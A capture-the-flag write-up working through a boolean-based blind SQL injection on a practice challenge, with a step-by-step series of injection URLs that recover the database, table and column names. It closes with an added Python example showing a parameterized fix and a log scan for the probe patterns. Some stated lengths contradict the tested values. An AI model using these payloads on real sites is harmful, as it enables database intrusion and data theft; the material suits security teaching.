Date: 2017.9.29
Challenge link: www.shiyanbar.com/ctf/1909
Approach: boolean-based blind SQL injection; the database is MySQL
1) http://ctf5.shiyanbar.com/web/index_3.php?id=1 and 1=1 / 1=2 —— no change in the page
   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and '1'='1 / '1'='2 —— the page changes
Conclusion: this is a boolean-based blind injection, and the id value sits inside single quotes, so the injected condition only takes effect once the quote is closed.
2) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())>0 —— this statement kept throwing an error. I knew the single quote was not closed but did not know how to write it, so I ran sqlmap against it and learned that the correct form is the one below. Result: the current database name is 4 characters long.
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())=4 and '1'='1
3) Guess the database name one character at a time:
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),1,1))=119 and '1'='1 —— w
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),2,1))=101 and '1'='1 —— e
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),3,1))=119 and '1'='1 —— b
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),4,1))=49 and '1'='1 —— 1
Result: the database name is web1
4) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 and '1'='1 —— the web1 database contains 2 tables
5) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4 and '1'='1 —— the first table name is 4 characters long
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=4 and '1'='1 —— the second table name is 5 characters long
6) Guess the first table name first:
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102 and '1'='1 —— f
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108 and '1'='1 —— l
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97 and '1'='1 —— a
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103 and '1'='1 —— g
7) 然后猜解flag表中字段數(shù)
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(column_name) from information_schema.columns where table_name='flag')=2? and '1'='1? ——? flag 表中只有2個字段
8) Guess the length of the 2 column names in the flag table:
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1))=4 and '1'='1 —— the first column name is 4 characters long
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1))=4 and '1'='1 —— the second column name is 2 characters long
9) Guess the 2 column names in the flag table:
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1))=102 and '1'='1 —— f
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),2,1))=108 and '1'='1 —— l
and so on for the remaining characters.
10) Extract the data
The steps are all the same as above. Manual injection is really tedious; sqlmap can be used directly and is much faster.
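The following is an added example and not the challenge's own code. It models in Python what the write-up observed in step 1 and what closes the oracle: a query built by string concatenation with the value inside quotes, beside the same lookup with a bound parameter, and a small check over constructed access-log lines for the probe signatures used in steps 2 to 9 (ascii(), substr(), length(), information_schema). The database is an in-memory SQLite stand-in for the challenge's MySQL database, the news and flag tables are assumed, and the log lines are constructed. One caveat on the stand-in: in MySQL with an integer id column, the string '1 and 1=2' is cast to 1 so both variants of the unquoted probe return the original row, whereas in SQLite both return nothing; in both cases the two responses are identical, which is exactly why that probe gives no oracle.

```python
"""Added example (not the challenge's own code): a boolean-blind oracle in a
string-concatenated query versus a parameterized one, plus a simple log check
for the probe signatures used in the write-up. Table layout is assumed."""
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the challenge's database (assumption: a `news`
# table looked up by id, and a `flag` table with two columns as in step 7).
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE news (id TEXT, title TEXT);
    INSERT INTO news VALUES ('1', 'hello world'), ('2', 'second post');
    CREATE TABLE flag (flag TEXT, id TEXT);
    INSERT INTO flag VALUES ('flag{constructed-sample}', '1');
""")


def lookup_vulnerable(user_id: str) -> list:
    """Query built by string concatenation with the value inside quotes.
    This is why step 1 behaves as it does: `1 and 1=2` stays inside the
    literal and is compared as text, so the true/false variants look the
    same, while `1' and '1'='2` closes the quote and becomes a real condition."""
    sql = "SELECT title FROM news WHERE id='" + user_id + "'"
    return _conn.execute(sql).fetchall()


def lookup_parameterized(user_id: str) -> list:
    """Same lookup with a bound parameter: the input is only ever data."""
    return _conn.execute("SELECT title FROM news WHERE id=?", (user_id,)).fetchall()


def oracle_open(lookup) -> bool:
    """True when a known-true and a known-false condition produce different
    responses, i.e. the endpoint can be used as a boolean oracle."""
    return lookup("1' and '1'='1") != lookup("1' and '1'='2")


# Constructed access-log lines (not from the page), URL-encoded as a
# browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Sep/2017:10:01:02 +0800] "GET /web/index_3.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [29/Sep/2017:10:01:09 +0800] "GET /web/index_3.php?id=1%27%20and%20length%28database%28%29%29%3D4%20and%20%271%27%3D%271 HTTP/1.1" 200 512
10.0.0.5 - - [29/Sep/2017:10:01:15 +0800] "GET /web/index_3.php?id=1%27%20and%20ascii%28substr%28database%28%29%2C1%2C1%29%29%3D119%20and%20%271%27%3D%271 HTTP/1.1" 200 512
10.0.0.9 - - [29/Sep/2017:10:02:00 +0800] "GET /web/index_3.php?id=2 HTTP/1.1" 200 498
"""

# Signatures of the enumeration probes used in steps 2 to 9 of the write-up.
PROBE_RE = re.compile(
    r"ascii\s*\(|substr\s*\(|length\s*\(|information_schema\.|'\s*(?:and|or)\s*'",
    re.IGNORECASE,
)


def flag_probes(log_text: str) -> list:
    """Return (client_ip, decoded_request) for each line whose request
    matches a probe signature after URL-decoding."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        if not m:
            continue
        decoded = unquote_plus(m.group(1))
        if PROBE_RE.search(decoded):
            hits.append((line.split()[0], decoded))
    return hits


if __name__ == "__main__":
    print("vulnerable lookup leaks an oracle:", oracle_open(lookup_vulnerable))
    print("parameterized lookup leaks an oracle:", oracle_open(lookup_parameterized))
    for ip, req in flag_probes(SAMPLE_LOG):
        print("probe from", ip, "->", req)
```

The log check decodes the request before matching, because the probes arrive percent-encoded and a signature match on the raw line would miss them; it is a coarse signal meant for grouping suspicious requests by client, not a replacement for fixing the query.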